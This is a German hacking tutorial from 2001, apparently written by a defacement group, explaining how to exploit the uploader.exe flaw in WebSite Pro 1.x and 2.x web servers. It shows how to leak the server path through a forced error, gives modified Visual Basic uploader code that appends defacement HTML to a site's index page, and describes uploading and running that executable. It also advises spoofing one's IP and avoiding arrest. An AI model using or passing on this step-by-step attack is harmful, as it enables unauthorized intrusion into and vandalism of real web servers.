GitS - NETWORK proudly presents .-°°-..-°°-.:Hackers r us!:.-°°-..-°°-. by _.:³a[]|_|5E³:._ ( 2001 ) written for hackerattack.org WebSite Pro 1.X, 2.X Hacking - Webserver Dienst hacken or it`s that good to be evil .-°°-.:^:.-°°-. . INDEX . --------------- 1. A Hacker 2.1 WebSite PRO Hacking (german) 3. Greetings and thanx (including source codes) -------------------------------------------------------------------------------------------------------------------- 1. wie wird man ein hacker/cracker? 1. man schläft höchsten 3h am tag 2. man hat keine zeit für girls 3. ein hacker raucht dope 4. man sucht verzweifelt eine weibliche gleichgesinnte 5. naja man muss einige jahre exploits und bücher studieren, praxis dazugewinnen ... Der Preis der finsterniss geht dieses mal an: --->> neonow <<--- Special greetings to a special girl! yep i still love her ------------------------------------------------------------------------------------------------------------------- **************************************** 2.1 WebSite Pro. 1.X, 2.X hacking! **************************************** Ausgangstellung: ******************* den host den wir hacken wollen verwendet WebSite Pro 2.x oder niedriger. Und der admin war zu blöd dass er den uploader.exe bug, gefixed hat. Technischer Hintergrund: **************************** Website Pro ist eine Webserver application mit der sich asp, etc. sowie Visual Basic ExE files verwendet werden lassen. Der bug beruht auf der uploader.exe datei die es erlaubt datein in das verzeichnis www.victimhost.com/Uploads zu laden. Sie befindet sich standartmässig in dem verzeichnis www.victimhost.com/cgi-win. Security limits der uploader.exe: man kann keine datein überschreiben! Starting DEFACE Attack: ***************************** Nun denn wir gehen auf den host www.victimhost.com/cgi-win/uploader.exe ! und es erscheint eine website die 4 eingabefelder hat: Name: e-mail: File to upload: Descreption of file: und der Button Upload der HTML code sieht folgender maßen aus: ************************************************** Upload a File

Upload a file


NOTE: Your browser must support file uploading.

Your name:  (required)
Email address:  (required)
NOTE: If you don't see a "browse" button below, your browser
doesn 't support form-based file uploading. Netscape 2.0 and
later have this support.
File to upload: 
File description:  (required)


<webmaster@victimhost.com>
Tja nun müssen wir mal den localen pfad des servers herausfinden, wir wollen ja entweder die page defacen oder root erlangen, was beides kein problem ist :) wir wissen ja auch dass es ein windoof server sein muss, und wo da die passwörter gespeichert sind. ok dazu nehmen wir den source code der ausgegebnen page ( wie oben angeführt) nur ändern wir folgende zeile: anstatt:
nehmen wir: da wir ja nun noch keine möglichkeit haben den source der uploder.exe zu ändern müssen wir uns eine remote html erstellen die auf den targethost in unserem fall www.victimhost.com und auf die uploader.exe zugreift. weiters müssen wir das verzeichniss ändern damit ein fehler der uploader.exe ausgegeben wird, und wir den localen pfad des verzeichnisses erhalten. wir versuchen also auf ein file in verzeichnis zu laden das es nicht gibt. http://www.victimhost.com/cgi-win/uploader.exe/hackerattack_rulz/ | | | | | | | | targethost | | das verzeichnis das es sicher nicht gibt | | (sollte es dieses verzeichnis geben habe ich root des | | servers, und hätte die uploader.exe bereits gelöscht :)) | | / \ das uploader.exe dir \ die website pro uploader.exe zum uploaden von files :) wir hosten unsere html, die den veränderten code enthält, auf einem free-webspace anbieter. wir rufen unsere html auf und laden ein sinnloses file auf den server. wir erhalten nun eine fehler meldung: ***************************************** Error in /cgi-win/uploader.exe An error has occurred in /cgi-win/uploader.exe. Message: Failed to move your file C:\Programme\BlackWidow\ReadMe.txt into server's upload area. (c:\www\victimhost.com\htdocs\hackerattack_rulz\ReadMe.txt). Perhaps the upload area doesn't exist on the server. VB reports "File not found" Please note what you were doing when this problem occurred, so we can identify and correct it. Then contact the administrator of this service: **** ende der fehlermeldung *** tja nun wissen wir den localen pfad, wo die gesammten seiten gehostet werden in diesem fall ist es c:\www\victimhost\htdocs\hackerattack_rulz\ReadMe.txt so weit so gut wir gehen von dem fall aus das wir die index page von www.victimhost.com defacen wollen, wie ihr root erlangt will ich euch nicht erklären da die auswirkungen doch etwas ärger sind, aber es ist das selbe prinzip. wir wissen das die index page von www.victimhost.com startmain.html-ssi heisst, bzw diese defacen wolllen. tja nur wie machen wir das jetz. entweder wir versuchen die uploader.exe herunterzuladen was mit Blackwindow gut geht und diese dann decompilen. Visual basic decomplier findet man auf www.hackerattack.org unter filez. oder wir laden uns den web-application server WebSite Pro 2.X herunter. da diese schon den source code der uploader.exe enthält. und verändern ihn wie folgt: Die Uploader.exe: ********************* wir gehen zu folgendem code_abschnitt im modul (Uploader_Main) uploader.bas und ergänzen diesen: Public Sub DoGet() ' ' Serve the upload form ' Send ("Content-type: text/html") Send ("") Send ("Upload a File") Send ("") Send ("

Upload a file

") Send ("
") Send ("

NOTE 2501: Your browser must support file uploading.

") Send ("") Send ("
Your name:  (required)")
Send ("Email address:  (required)")
Send (" NOTE: If you don't see a ""browse"" button below, your browser")
Send (" doesn 't support form-based file uploading. Netscape 2.0 and")
Send (" later have this support.")
Send ("File to upload: ")
Send ("File description:  (required)")
Send ("")
Send (" 
") Send ("") Send ("") Send ("
") Send ("") Send ("
<" & CGI_ServerAdmin & ">
") Send ("
") 'dies ist der neue hinzugefügte code er enthält den html_code den wir der 'startmain.html-ssi von www.victimhost.com hinzufügen wollen. Open "c:\www\victimhost\htdocs\startmain.html-ssi" For Append Lock Read Write As #2 Print #2, "
" & vbCrLf _ ; "" & vbCrLf _ ; "" & vbCrLf _ ; "" & vbCrLf _ ; "
" & vbCrLf _ ; "


" & vbCrLf _ ; "append greetings to solaris :)

" & vbCrLf _ ; "

Hacked; " & vbCrLf; "" _ ; "by: -AbUse-
" & vbCrLf _ ; "Hacked throght website pro bug uploader.exe plz update your server or" & vbCrLf _ ; "delete updater.exe in the cgi-win dir if u don't need it
" & vbCrLf _ ; "
" & vbCrLf _ ; "cya -AbUse-

" & vbCrLf _ ; "
" Close #2 end sub nun compilieren wir die exe und benennen sie anders als uploader.exe zb.: githacker.exe beim aufrufen der exe wird dann sofort der neue html code (zum defacen der page) beigefügt. und wir müssen sonst nichts mehr machen. wie bekommen wir jetz die gitshacker.exe auf den server? ****************************************************************** wir erstellen uns eine neue html page. genauso wie die, die wir uns erstellt haben um den localen pfad der dirs zu erhalten nur mit einer kleinen änderung:
die uploader.exe wird damit angewiesen die dateien die man über sie hinaufläd in das dir cgi-win zu kopieren. wir hosten diese html wieder auf dem freespace account, und wählen aber diesmal die datei gitshacker.exe (also die von uns veränderte uploader.exe), welche hinaufgeladen werden soll. nun erhalten wir die meldung, dass das file erfolgreich hinaufgeladen wurde, und wir rufen per browser die hackerattack.exe auf: http://www.victimhost.com/cgi-win/hackerattack.exe nun erledigt die hackerattack.exe den hack für uns mission erfolgreich! page defaced :) das wars, viel spass beim hacken! 3. greetings written for hackerattack.org --- greets to all hackerattack members and all other not NSA infiltrated coders lovely greetings to: ------------------------- all hacker-girls, maybe there are some out !?¿ GitS-Network - CHANGE YOUR MIND! .-°°-..-°°-.: fighting for freedom :..-°°-..-°°-. don't contact us .. we are offline got fucked up by the justice.... NOTE: ALWAYS spoof your ip NOTE: the hackerattack.org exploits/tut's are not illegal, we are not responsable on possible abuses by useing this expoits/tut's !!! NOTE: don't got cought it really sux... you'll loose a lot of money and may you visit a prison for some years. Other Tut's by us: ****************** ColdFusion Part1 * Hacking ColdFusion Webpages ColdFusion Part 2 * Hacking ColdFusion Webpages - Part 2 get root ColdFusion addon3 * quick registry attack poor DOS attack * We provide this dos attack over the admins login of CF Server / Attacke über Admin Login des CF Server poor internal mail serverattack * change coldfusion mail server settings / Die ColdFusion server mail settings ändern Hacking NetBios * PART I Hacking from WIN2k Respected Divisions: ******************** hackerattack.org (well u may find more tuts by us at this page) computec.ch (well u may find more tuts by us at this page) Respected Groups / Peoples: *************************** MiLW0rm euroarmy cyberarmy MixTer Security Kevin Mitnick Koch hackerattack.org